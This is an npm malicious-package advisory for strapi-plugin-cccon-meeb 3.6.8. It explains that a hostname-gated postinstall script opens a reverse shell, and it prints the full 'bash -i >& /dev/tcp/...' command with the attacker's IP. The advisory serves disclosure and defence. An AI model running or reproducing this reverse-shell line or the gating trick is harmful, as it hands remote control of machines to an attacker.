VYPR

npm · Malicious package advisory

Malware

strapi-plugin-cccon-meeb

GHSA-75rj-xxh3-3j2q

Malicious code in strapi-plugin-cccon-meeb (npm)

Details

**Severity:** Critical

**Affected versions:** `= 3.6.8`

## Source: amazon-inspector (b6c0ca5cf1881ed03c4a8b91832bcd8f65854bd36d9b764843370d26f599c2a0)
postinstall.js runs automatically on `npm install` and executes a bash reverse shell to the hardcoded remote host 14.225.210.85:80 via `/dev/tcp`, granting that host interactive command execution on the installing machine. Execution is gated by `os.hostname() === 'ubuntu-fc-uvm'`: on non-matching hosts the script exits silently, while on the targeted hostname it spawns `bash -i >& /dev/tcp/14.225.210.85/80 0>&1`. The hostname allowlist is a detonation guard that keeps the payload dormant on generic scanners and typical developer machines while firing on the intended target. The package is presented as a Strapi plugin but ships no plugin functionality relevant to this behavior in the postinstall path; the lifecycle script's sole effect is the reverse-shell attempt.

---

Credit: [OpenSSF](https://github.com/ossf/malicious-packages) ([source](https://github.com/ossf/malicious-packages/blob/77e1abe54c807a94ef54fde706a23385c94d9e9b/osv/malicious/npm/strapi-plugin-cccon-meeb/MAL-2026-16225.json))

**References:**
- https://github.com/ossf/malicious-packages/blob/77e1abe54c807a94ef54fde706a23385c94d9e9b/osv/malicious/npm/strapi-plugin-cccon-meeb/MAL-2026-16225.json
- https://www.npmjs.com/package/strapi-plugin-cccon-meeb/v/3.6.8
- https://github.com/advisories/GHSA-75rj-xxh3-3j2q

Compromised versions (1)

  • = 3.6.8

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.